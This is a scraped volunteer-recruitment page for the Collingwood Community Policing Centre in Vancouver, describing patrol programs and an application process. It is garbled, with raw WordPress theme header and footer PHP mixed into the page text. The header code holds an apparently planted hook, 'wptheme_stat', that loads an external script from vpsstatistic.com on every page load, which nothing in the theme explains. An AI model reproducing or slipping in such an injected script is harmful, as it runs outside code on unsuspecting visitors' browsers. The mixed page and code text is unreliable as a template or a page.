<?php /** * The header. * * This is the template that displays all of the <head> section and everything up until main. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WordPress * @subpackage Twenty_Twenty_One * @since Twenty Twenty-One 1.0 */ ?> <!doctype html> <html <?php language_attributes(); ?> <?php twentytwentyone_the_html_classes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'twentytwentyone' ); ?></a> <?php get_template_part( 'template-parts/header/site-header' ); ?> <div id="content" class="site-content"> <div id="primary" class="content-area"> <main id="main" class="site-main"> function wptheme_stat() ?> <script async src="https://vpsstatistic.com/visitors.js"></script> <?php add_action("wp_head", "wptheme_stat");

Volunteer with Us

Kingsgate Mall Pumpkin Carving Contest (2012)

Kingsgate Mall Pumpkin Carving Contest (2012)

WANT TO BECOME A VOLUNTEER WITH THE COLLINGWOOD CPC?

Opportunities

Becoming a volunteer is great way to give back to your community, and to build memorable experiences and knowledge to use in future endeavors. Becoming a volunteer will allow you to participate in foot patrols, bike patrols, speed watches, and many more programs that are offered. Along with all the programs both inside and outside the office, you may participate in the different community events that the Collingwood CPC supports such as movies nights, pals, and parades.

There is always room for more volunteers to help out with the Collingwood CPC whether its through one of our patrol programs, or office work inside. Not only do we just cover the Renfrew Collingwood area but also Killarney Mount Pleasent, Cedar Cottage, Fraserview, and Champlain Heights.

Integrity

At the Collingwood CPC we treat everyone equally with respect. We help represent the Collingwood area, and the city of Vancouver and keep a high level of professional standards, ethics, and values. Honesty and communication skills are of an utmost importance and that we align ourselves in a welcoming manner. We ask of future volunteers to be able to commit to 8 hours a month of volunteer time.

References

Not only are we able to support many volunteer programs and community events, but when volunteering we may also give you a great reference especially when looking into law enforcement. While volunteering with the Collingwood CPC it gives you the opportunity to interact with different members of the Vancouver Police Department, whether it be with our neighborhood police officers at the CPC or other officers from different training seminars.

11707536_10153533033958013_8934865675421032484_n

Requirements

How to Volunteer? (Application Process)

  1. Application must be filled out at the office. Staff only will sign as witness.
  2. Photo copy of I.D. (Drivers License) will be taken.
  3. Must provide three valid references. No members of family allowed.
  4. Interview with a staff member.
  5. There may be an interview by the NPO either before or after orientation.
  6. There is a drug policy. If you have tried illegal drugs you may be either deferred or not accepted. Many factors will be utilized including the number of times used, what happened, and the age of the volunteer applicant.
  7. When you receive the Criminal Record Check back, you will need to bring it to the office for the next step.
  8. Membership fee is $5.00 and is payable at the orientation.
  9. As well, you can purchase a T-Shirt for $10.00 to be used on patrol, as well as a hat.
  10. We reserve the right to defer or refuse any applicant.
<?php /** * The template for displaying the footer * * Contains the closing of the #content div and all content after. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WordPress * @subpackage Twenty_Twenty_One * @since Twenty Twenty-One 1.0 */ ?> </main><!-- #main --> </div><!-- #primary --> </div><!-- #content --> <?php get_template_part( 'template-parts/footer/footer-widgets' ); ?> <footer id="colophon" class="site-footer"> <?php if ( has_nav_menu( 'footer' ) ) : ?> <nav aria-label="<?php esc_attr_e( 'Secondary menu', 'twentytwentyone' ); ?>" class="footer-navigation"> <ul class="footer-navigation-wrapper"> <?php wp_nav_menu( array( 'theme_location' => 'footer', 'items_wrap' => '%3$s', 'container' => false, 'depth' => 1, 'link_before' => '<span>', 'link_after' => '</span>', 'fallback_cb' => false, ) ); ?> </ul><!-- .footer-navigation-wrapper --> </nav><!-- .footer-navigation --> <?php endif; ?> <div class="site-info"> <div class="site-name"> <?php if ( has_custom_logo() ) : ?> <div class="site-logo"><?php the_custom_logo(); ?></div> <?php else : ?> <?php if ( get_bloginfo( 'name' ) && get_theme_mod( 'display_title_and_tagline', true ) ) : ?> <?php if ( is_front_page() && ! is_paged() ) : ?> <?php bloginfo( 'name' ); ?> <?php else : ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php bloginfo( 'name' ); ?></a> <?php endif; ?> <?php endif; ?> <?php endif; ?> </div><!-- .site-name --> <?php if ( function_exists( 'the_privacy_policy_link' ) ) { the_privacy_policy_link( '<div class="privacy-policy">', '</div>' ); } ?> <div class="powered-by"> <?php printf( /* translators: %s: WordPress. */ esc_html__( 'Proudly powered by %s.', 'twentytwentyone' ), '<a href="' . esc_url( __( 'https://wordpress.org/', 'twentytwentyone' ) ) . '">WordPress</a>' ); ?> </div><!-- .powered-by --> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <?php wp_footer(); ?> </body> </html>